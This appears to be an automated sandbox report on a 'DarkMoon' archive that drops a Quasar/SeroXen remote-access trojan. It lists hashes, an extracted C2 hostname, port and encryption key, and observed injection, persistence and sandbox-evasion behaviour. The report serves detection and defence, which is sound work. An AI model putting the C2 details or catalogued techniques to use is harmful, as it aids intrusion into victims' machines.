Analysis
-
max time kernel
1800s -
max time network
1798s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 14:48
Static task
static1
Behavioral task
behavioral1
Sample
DarkMoon_Gen_1-3.zip
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
DarkMoon_Gen_1-3/lib/main.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win10v2004-20240508-en
General
-
Target
DarkMoon_Gen_1-3/starter.bat
-
Size
51B
-
MD5
abc778ba27885c72f364ad89b1306862
-
SHA1
2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
-
SHA256
97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
-
SHA512
65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Extracted
quasar
1.0.0.0
v2.2.6 | SeroXen
seroooooxeen.chickenkiller.com:5059
f953c0af-702a-46b5-ad07-d900b11c5cd9
-
encryption_key
458790DC6E62EEB3043B4566BF95CDAF711F1EC0
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/2952-58-0x0000015B78620000-0x0000015B78DEA000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3188 created 5436 3188 WerFault.exe dllhost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
uni.bat.exe$sxr-powershell.exesvchost.exedescription pid process target process PID 1292 created 628 1292 uni.bat.exe winlogon.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe PID 1292 created 628 1292 uni.bat.exe winlogon.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe PID 1892 created 5436 1892 svchost.exe dllhost.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe PID 2952 created 628 2952 $sxr-powershell.exe winlogon.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exeuni.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation uni.bat.exe -
Executes dropped EXE 5 IoCs
Processes:
uni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exepid process 1292 uni.bat.exe 2136 $sxr-mshta.exe 4884 $sxr-cmd.exe 2952 $sxr-powershell.exe 2812 $sxr-powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
main.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" main.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Drops file in System32 directory 17 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exesvchost.exeDllHost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe -
Suspicious use of SetThreadContext 18 IoCs
Processes:
uni.bat.exe$sxr-powershell.exedescription pid process target process PID 1292 set thread context of 1548 1292 uni.bat.exe dllhost.exe PID 1292 set thread context of 392 1292 uni.bat.exe dllhost.exe PID 2952 set thread context of 3760 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 3632 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 4936 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 4552 2952 $sxr-powershell.exe dllhost.exe PID 1292 set thread context of 5168 1292 uni.bat.exe dllhost.exe PID 1292 set thread context of 4784 1292 uni.bat.exe dllhost.exe PID 2952 set thread context of 4568 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 6412 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 6528 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 6220 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 5436 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 1524 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 3892 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 5744 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 7104 2952 $sxr-powershell.exe dllhost.exe PID 2952 set thread context of 5540 2952 $sxr-powershell.exe dllhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
uni.bat.exeTiWorker.exesvchost.exedescription ioc process File created C:\Windows\$sxr-powershell.exe uni.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe uni.bat.exe File created C:\Windows\$sxr-mshta.exe uni.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe uni.bat.exe File created C:\Windows\$sxr-cmd.exe uni.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe uni.bat.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exesvchost.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Delays execution with timeout.exe 13 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 5060 timeout.exe 5800 timeout.exe 4548 timeout.exe 6388 timeout.exe 2848 timeout.exe 5456 timeout.exe 2268 timeout.exe 6636 timeout.exe 4728 timeout.exe 1116 timeout.exe 528 timeout.exe 4784 timeout.exe 4108 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
mousocoreworker.exewmiprvse.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3604 taskkill.exe -
Modifies data under HKEY_USERS 57 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8970F1BD-AAF6-4C17-9F29-8F7F30B80721}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 02 Jun 2024 15:00:21 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717340420" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe -
Modifies registry class 5 IoCs
Processes:
$sxr-mshta.exesihost.exeExplorer.EXERuntimeBroker.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe -
Runs ping.exe 1 TTPs 18 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 5968 PING.EXE 4108 PING.EXE 3848 PING.EXE 4424 PING.EXE 1864 PING.EXE 5568 PING.EXE 4156 PING.EXE 968 PING.EXE 212 PING.EXE 3860 PING.EXE 1944 PING.EXE 4568 PING.EXE 3320 PING.EXE 6684 PING.EXE 3384 PING.EXE 816 PING.EXE 4548 PING.EXE 6980 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exepid process 1292 uni.bat.exe 1292 uni.bat.exe 1292 uni.bat.exe 1292 uni.bat.exe 1548 dllhost.exe 1548 dllhost.exe 392 dllhost.exe 392 dllhost.exe 392 dllhost.exe 392 dllhost.exe 1548 dllhost.exe 1548 dllhost.exe 1292 uni.bat.exe 1292 uni.bat.exe 2952 $sxr-powershell.exe 2952 $sxr-powershell.exe 2952 $sxr-powershell.exe 2952 $sxr-powershell.exe 2952 $sxr-powershell.exe 3632 dllhost.exe 3632 dllhost.exe 3632 dllhost.exe 3632 dllhost.exe 3760 dllhost.exe 3760 dllhost.exe 3760 dllhost.exe 3760 dllhost.exe 2952 $sxr-powershell.exe 2952 $sxr-powershell.exe 2812 $sxr-powershell.exe 2812 $sxr-powershell.exe 2952 $sxr-powershell.exe 4936 dllhost.exe 4936 dllhost.exe 4552 dllhost.exe 4552 dllhost.exe 4552 dllhost.exe 4552 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 4552 dllhost.exe 4552 dllhost.exe 2812 $sxr-powershell.exe 2812 $sxr-powershell.exe 4936 dllhost.exe 4936 dllhost.exe 4552 dllhost.exe 4552 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 2812 $sxr-powershell.exe 2812 $sxr-powershell.exe 4552 dllhost.exe 4552 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe 4552 dllhost.exe 4552 dllhost.exe 4936 dllhost.exe 4936 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 1292 uni.bat.exe Token: SeDebugPrivilege 1292 uni.bat.exe Token: SeDebugPrivilege 1548 dllhost.exe Token: SeDebugPrivilege 392 dllhost.exe Token: SeDebugPrivilege 2952 $sxr-powershell.exe Token: SeDebugPrivilege 2952 $sxr-powershell.exe Token: SeDebugPrivilege 3632 dllhost.exe Token: SeDebugPrivilege 3760 dllhost.exe Token: SeDebugPrivilege 2812 $sxr-powershell.exe Token: SeDebugPrivilege 2952 $sxr-powershell.exe Token: SeDebugPrivilege 4936 dllhost.exe Token: SeDebugPrivilege 4552 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2228 svchost.exe Token: SeIncreaseQuotaPrivilege 2228 svchost.exe Token: SeSecurityPrivilege 2228 svchost.exe Token: SeTakeOwnershipPrivilege 2228 svchost.exe Token: SeLoadDriverPrivilege 2228 svchost.exe Token: SeSystemtimePrivilege 2228 svchost.exe Token: SeBackupPrivilege 2228 svchost.exe Token: SeRestorePrivilege 2228 svchost.exe Token: SeShutdownPrivilege 2228 svchost.exe Token: SeSystemEnvironmentPrivilege 2228 svchost.exe Token: SeUndockPrivilege 2228 svchost.exe Token: SeManageVolumePrivilege 2228 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2228 svchost.exe Token: SeIncreaseQuotaPrivilege 2228 svchost.exe Token: SeSecurityPrivilege 2228 svchost.exe Token: SeTakeOwnershipPrivilege 2228 svchost.exe Token: SeLoadDriverPrivilege 2228 svchost.exe Token: SeSystemtimePrivilege 2228 svchost.exe Token: SeBackupPrivilege 2228 svchost.exe Token: SeRestorePrivilege 2228 svchost.exe Token: SeShutdownPrivilege 2228 svchost.exe Token: SeSystemEnvironmentPrivilege 2228 svchost.exe Token: SeUndockPrivilege 2228 svchost.exe Token: SeManageVolumePrivilege 2228 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2228 svchost.exe Token: SeIncreaseQuotaPrivilege 2228 svchost.exe Token: SeSecurityPrivilege 2228 svchost.exe Token: SeTakeOwnershipPrivilege 2228 svchost.exe Token: SeLoadDriverPrivilege 2228 svchost.exe Token: SeSystemtimePrivilege 2228 svchost.exe Token: SeBackupPrivilege 2228 svchost.exe Token: SeRestorePrivilege 2228 svchost.exe Token: SeShutdownPrivilege 2228 svchost.exe Token: SeSystemEnvironmentPrivilege 2228 svchost.exe Token: SeUndockPrivilege 2228 svchost.exe Token: SeManageVolumePrivilege 2228 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2228 svchost.exe Token: SeIncreaseQuotaPrivilege 2228 svchost.exe Token: SeSecurityPrivilege 2228 svchost.exe Token: SeTakeOwnershipPrivilege 2228 svchost.exe Token: SeLoadDriverPrivilege 2228 svchost.exe Token: SeSystemtimePrivilege 2228 svchost.exe Token: SeBackupPrivilege 2228 svchost.exe Token: SeRestorePrivilege 2228 svchost.exe Token: SeShutdownPrivilege 2228 svchost.exe Token: SeSystemEnvironmentPrivilege 2228 svchost.exe Token: SeUndockPrivilege 2228 svchost.exe Token: SeManageVolumePrivilege 2228 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2228 svchost.exe Token: SeIncreaseQuotaPrivilege 2228 svchost.exe Token: SeSecurityPrivilege 2228 svchost.exe Token: SeTakeOwnershipPrivilege 2228 svchost.exe -
